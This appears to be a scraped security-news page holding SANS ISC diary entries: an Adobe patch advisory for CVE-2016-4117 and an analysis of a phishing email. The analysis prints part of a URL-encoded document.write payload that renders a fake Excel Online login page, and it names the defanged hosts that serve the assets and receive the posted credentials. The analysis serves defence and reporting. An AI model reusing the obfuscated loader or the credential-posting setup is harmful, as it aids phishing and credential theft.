Information Security News |
Anonymous' Op Icarus: Cyberattacks on Banks Around the World SYS-CON Media (press release) As part of its mission to share and analyze information security news, Peerlyst (https://www.peerlyst.com) has published a blog that discusses the recent wave of distributed denial of service (DDoS) attacks that Anonymous has used to take out central ... |
SANS Announces Agenda for Annual DFIR Summit in Austin, Texas SYS-CON Media (press release) BETHESDA, Md., May 12, 2016 /PRNewswire-USNewswire/ -- SANS Institute, the global leader in information security training, today announced the agenda for its annual Digital Forensics & Incident Response (DFIR) Summit and Training to be held June 23 ... |
As expected, Adobe released today updated versions of:
They are related toCVE-2016-4117. Windows, OSX, Linux and ChromeOS are affected but the patch is currently only available for Windows. Patch as soon as possible because the vulnerability is actively exploited in the wild.
Details:https://helpx.adobe.com/security/products/flash-player/apsa16-02.html
They alsoreleased new updated versions of:
Details:https://helpx.adobe.com/security/products/acrobat/apsb16-14.html
Finally, ColdFusion also got a patch:https://helpx.adobe.com/security/products/coldfusion/apsb16-16.html
Xavier Mertens
ISC Handler - Freelance Security Consultant
PGP Key
Anonymous' Op Icarus: Cyberattacks on Banks Around the World SYS-CON Media (press release) As part of its mission to share and analyze information security news, Peerlyst (https://www.peerlyst.com) has published a blog that discusses the recent wave of distributed denial of service (DDoS) attacks that Anonymous has used to take out central ... |
The Register | Lie back and think of cybersecurity: IBM lets students loose on Watson The Register That's because the infosec (sorry cyber security) biz is guilty of re-appropriating military terms such as APT en masse. IBM said collaborating with eight universities that have “some of the world's best cybersecurity programs” will help “further train ... |
Im collecting a lot ofphishing samples every day and most of them are part of big waves of spam... Millions of messagesare sent with hopethat at least some victims will fall in the trap. And sometimes, you find a nice (different) one like yesterday. It was a classic email with the subject Important Notice"> document.write(unescape(%3c%21%64%6f%63%74%79%70%65%20%68%74%6d%6c%3e%0d%0a%3c%68%74%6d%6c%3e%0d%0a%3c%68%65%61%64%3e%0d%0a%3c%6d%65%74%61%20%63%68%61%72%73%65%74%3d%22%75%74%66%2d%38%22%3e%0d%0a%3c%74%69%74%6c%65%3e%45%78%63%65%6c%20%4f%6e%6c%69%6e%65%3c%2f%74%69%74%6c%65%3e%0d%0a%3c%6d%65%74%61%20%6e%61%6d%65%3d%22%67%65%6e%65%72%61%74%6f%72%22%20%63%6f%6e%74%65%6e%74%3d%22%57%59%53%49%57%59%47%20%... (very long payload) ...4%3d%22%22%3e%3c%2f%64%69%76%3e%0d%0a%3c%2f%62%6f%64%79%3e%0d%0a%3c%2f%68%74%6d%6c%3e
This is not complicated to de-obfuscate this payload (the code is available here).The attacker generated a page with an online HTML editor and added a form to capture credentials.The rendered page looks like" />
The HTML objects are downloaded fromhxxp://tourkrabithailand.com/images/services/gr/ and credentials are posted tohxxp://mat-update.be/money/result.php. I contacted the Belgian CERT yesterday to report this website andthe domain isalready blocked.
Nothing fancy, bad design (why a blue Download button?) but it works! The JavaScript code runsbelow the radar with a low VT detection rate: 2/56 (link).
Xavier Mertens
ISC Handler - Freelance Security Consultant
PGP Key
